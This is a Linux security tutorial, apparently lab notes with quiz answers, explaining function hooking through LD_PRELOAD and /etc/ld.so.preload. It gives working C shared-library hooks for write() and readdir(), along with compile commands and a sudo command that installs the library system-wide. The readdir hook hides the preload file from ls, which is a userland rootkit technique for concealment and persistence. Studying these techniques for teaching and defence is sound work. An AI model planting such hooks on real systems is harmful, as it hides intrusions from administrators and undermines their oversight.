# Linux Function Hooking 
---
## What Are Shared Libraries ?
Shared Libraries are basically compiled complied C codes that contains function definitions which can be later called to perform certain functions. When we run dynamically linked executables, the system looks up the definitions of common functions in these libraries.

Common Shared Libraries which  Linux Contains are :
-   **libc** : The standard C library.
-   **glibc** : GNU Implementation of standard **libc**.
-   **libcurl** : Multiprotocol file transfer library.
-   **libcrypt** : C Library to facilitate encryption, hashing, encoding etc.

`ldd` -   prints the shared objects (shared libraries) required by each program or shared object specified on the command line

```
 ?  What is the name of the dynamic linker/loader on linux?
 -> ld.so, ld-linux.so
```

## Bit Technical
We know,
1.  When we execute a dynamically linked executable, it issues calls to certain standard functions which are predefined in shared libraries.
2.  The system looks up the address of the function in the shared libraries.
3.  The system returns the address of the **first** instance of the function as located in the shared library.
4.  It then performs the required actions.

How check dynamically linked libraries of `ls`

 ```
 ldd `which ls`
 ```
 OR
 ```
 ldd (which ls)
 ```
 
 OR
 ```
 ldd /bin/ls
 ```
 
How the system's dynamic linker loads these dynamic libraries during launching a program ?

There are some Environment Variables and System Paths where the dynamic linker looks for these shared libraries while running programs.

The things of our interests are,

 _(1) The **LD_PRELOAD** environment variable._
 _(2) The **--preload** command-line option when invoking the dynamic linker directly._
 _(3) The **/etc/ld.so.preload** file._
 
We are more interested in points _(1)_ and _(3)_ as they let us specify our own shared objects which are loaded _BEFORE_  other shared libraries, and much like PATH hijacking attacks, we are going to use these to create our very own malicious shared libraries!


```
? What environment variable let's you load your own shared library before all others?
-> LD_PRELOAD

? Which file contains a whitespace-separated list of ELF shared objects to be loaded before running a program?
-> `/etc/ld.so.preload`

? If both the environment variable and the file are employed, the libraries specified by which would be loaded first?
-> environment variable
```

## Example 1 : Abuse write()
**Lets understand the things with wrie(),**

```c
#include <unistd.h>  
int main()  
{  
 char str[12];  
 int s;  
 s=read(0, str,13);   
 write(1, str, s);   
 return 0;  
}
```

OUTPUT:

![image](../assets/HlUwm67.png)

Under normal circumstances, when the dynamic linker comes across the `write()` function, it looks up its address in the standard shared libraries. On encountering the first occurrence of `write()`, it passes the arguments to the function and return an output accordingly

 **Create Malicious shared library with write()**

It is very important that our malicious function also has the same function definition and return type as the original function which we are trying to hook. With that out of the way, let's get to writing our own malicious shared library as follows,

```c
#include <stdio.h>  
#include <unistd.h>  
#include <dlfcn.h>  
#include <string.h>  
ssize_t write(int fildes, const void *buf, size_t nbytes)  
{  
 ssize_t (*new_write)(int fildes, const void *buf, size_t nbytes);   
 ssize_t result;  
 new_write = dlsym(RTLD_NEXT, "write");  
 if (strncmp(buf, "Hello World",strlen("Hello World")) == 0)  
 {  
 result = new_write(fildes, "Hacked 1337", strlen("Hacked 1337"));  
 }  
 else  
 {  
 result = new_write(fildes, buf, nbytes);  
 }  
 return result;  
}
```

We created a function pointer `new_write` to store original `write()` location. We use the `dlsym` function to get the address of next occurrence of `write` from the standard shared libraries. Make sure to provide same paramaters and return type to hooked function.

```
? How many arguments does **write()** take?
->3

? Which feature test macro must be defined in order to obtain the  definitions  of RTLD_NEXT from <dlfcn.h>?**
-> _GNU_SOURCE

```

**Compiling Our Program malicious program**

`gcc -ldl malicious.c -fPIC -shared -D_GNU_SOURCE -o malicious.so`

_Note : If you run into a `symbol lookup error` at any point, try the following compile statement:_

`gcc malicious.c -fPIC -shared -D_GNU_SOURCE -o malicious.so -ldl`

-   **gcc** : Our very own GNU Compiler Collection.
-   -ldl : Link against libdl aka the dynamic linking library.
-   **malicious.c** : The name of our program. 
-   **-fPIC** : Generate position-independent code. (Excellent answer on why this is needed can be found [here](https://stackoverflow.com/questions/966960/what-does-fpic-mean-when-building-a-shared-library)).
-   **-shared** : Tells the compiler to create a Shared Object which can be linked with other objects to produce an executable.
-   **-D_GNU_SOURCE** : It is specified to satisfy **#ifdef** conditions that allow us to use the **RTLD_NEXT** enum (Yes, this is what I was talking about in Question #2 of Task 4) . Optionally this flag can be replaced by adding `#define _GNU_SOURCE`.
-   **-o** : Specify the name of the output executable.
-   **malicious.so** : Name of output file.


With this done, we have a `malicious.so` object file ready to hook a function, just waiting to be pre-loaded.

**Pre-Loading Our Shared Object**

To pre-Load our library before other library we have following 2 ways,

-   Using `LD_PRELOAD`
-   Using `/etc/ld.so.preload` file

If both ways are specified then library specified by **LD_PRELOAD** will load first.

Using LD_PRELOAD:
`export LD_PRELOAD=$(pwd)/malicious.so`

Using /etc/ld.so.preload:
`sudo sh -c "echo $(pwd)/malicious.so > /etc/ld.so.preload"`

_Run above commands from the directory containing the shared object file._

**Verify is shared object loaded**
```
$ ldd /bin/ls  
 linux-gate.so.1 (0xb7fc0000)  
 /home/whokilleddb/malicious.so  (0xb7f8f000)  
 libselinux.so.1 => /lib/i386-linux-gnu/libselinux.so.1 (0xb7f43000)  
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7d65000)  
 lbdl.so.2 => /lib/i386-linux-gnu/libdl.so.2 (0xb7d5f000)  
 libpcre.so.3 => /lib/i386-linux-gnu/libpcre.so.3 (0xb7ce6000)  
 /lib/ld-linux.so.2 (0xb7fc2000)  
 libpthread.so.0 => /lib/i386-linux-gnu/libpthread.so.0 (0xb7cc5000)
```

The program makes a call to the `write()` function with all the parameters in place. However, instead of going to the **libc** definition of `write()` it goes to our malicious shared object as the dynamic linker finds the **FIRST OCCURRENCE** of `write()`. In our example we are provding the condition on when to invoke malicious function.

![image](../assets/1.png)

We can see the output of `write()` function as follow, `write())`will  get called at different places.

![image](../assets/iMXZTMG.png)

```
? When compiling our code to produce a Shared Object, which flag is used to create position independent code?
-> -fPIC

? Can hooking libc functions affect the behavior of Python3? (Yay/Nay)
-> Yay
```

## Example 2 : HIding files from ls 

`ls` command list the files and folder in directory. To hide the files from `ls` command we need to go into details of that command. [here's an excellent resource](https://gist.github.com/amitsaha/8169242).

The important function from `ls` command implementation is `readdir()`, this functions returns pointer to next `dirent` structure in directory. A `dirent` is a C - structure who's **glibc** definition can be obtained from the man page of **readdir**

```
struct dirent {  
 ino_t          d_ino;       /* Inode number */  
 off_t          d_off;       /* Not an offset; see below */  
 unsigned short d_reclen;    /* Length of this record */  
 unsigned char  d_type;      /* Type of file; not supported not supported by all filesystem types */   
 char           d_name[256]; /* Null-terminated filename */  
 };
```

**d_name[256]** is important field as it contains name of various files in our directory.

**Steps**
-   `ls` uses `readdir()` function to get the contents of a directory
-   The `readdir()` function returns a pointer to a `dirent` structure to the next directory entry
-   The `dirent` structure contains a `d_name` parameter which contains the name of the file
-   Thus, we hook the `readdir()` function
-   Then we pass the parameters to the original function and check whether the `d_name` parameter of the `dirent` whose pointer is being returned is equal to a given a filename
-   If yes, we skip it and pass on the rest.

```c

#include <string.h>  
#include <stdlib.h>  
#include <dirent.h>  
#include <dlfcn.h>  
  
#define FILENAME "ld.so.preload"  
  
struct dirent *readdir(DIR *dirp)  
{  
 struct dirent *(*old_readdir)(DIR *dir);   
 old_readdir = dlsym(RTLD_NEXT, "readdir");  
 struct dirent *dir;  
 while (dir = old_readdir(dirp))  
 {  
 if(strstr(dir->d_name,FILENAME) == 0) break;   
 }  
 return dir;  
}  
  
struct dirent64 *readdir64(DIR *dirp)  
{  
 struct dirent64 *(*old_readdir64)(DIR *dir);   
 old_readdir64 = dlsym(RTLD_NEXT, "readdir64");  
 struct dirent64 *dir;  
 while (dir = old_readdir64(dirp))  
 {  
 if(strstr(dir->d_name,FILENAME) == 0) break;  
 }  
 return dir;  
}
```

Breaking down our hook, we have:

-   First we declare our usual headers with the extra `#include <dirent.h>` header which contains the definition of the `dirent` structure
-   Then, we do our usual hooking stuff: creating a function with the same definition and return type, create a function pointer and use `dlsym` to store the value of the original function in it.
-   Finally coming to the most crucial part, we create a while loop and fetch the pointer to the next `dirent` structure in the directory stream pointed to by `dirp` and check if the `d_name` parameter contains our string. If it doesn't (which is denoted by an output **0** as a result of the `strstr` function), we simply break from the loop and return the value as obtained from the original function. However, if we have a match, we iterate one more time, thereby effectively skipping over our file a return pointer to the **dirent** structure pertaining to the next file in the directory.

It is to be noted that you can still modify the file or cat out its contents. However, it will not show in the output of the `ls` command! This can be very useful if you want to hide malicious files, alter filenames, etc. One very popular use is to hide the `/etc/ld.so.preload` file or the shared object itself!

![image](../assets/121.png)

As you can see in the screenshot, when the malicious shared object was loaded, `ls` did not list our file in its output. However, we were still able to read its contents by specifically mentioning its path. Hence, you can hide files in plain sight which no-one but you would know about. Wasn't that pretty cool?.

```
? There are two mandatory fields of a **dirent** structure. One is **d_name**, and the other one is?
-> d_ino
```

_[Note : If you are stuck, [here's an article I wrote](https://www.linuxfordevices.com/tutorials/linux/hiding-files-in-linux-with-c) on this very topic]_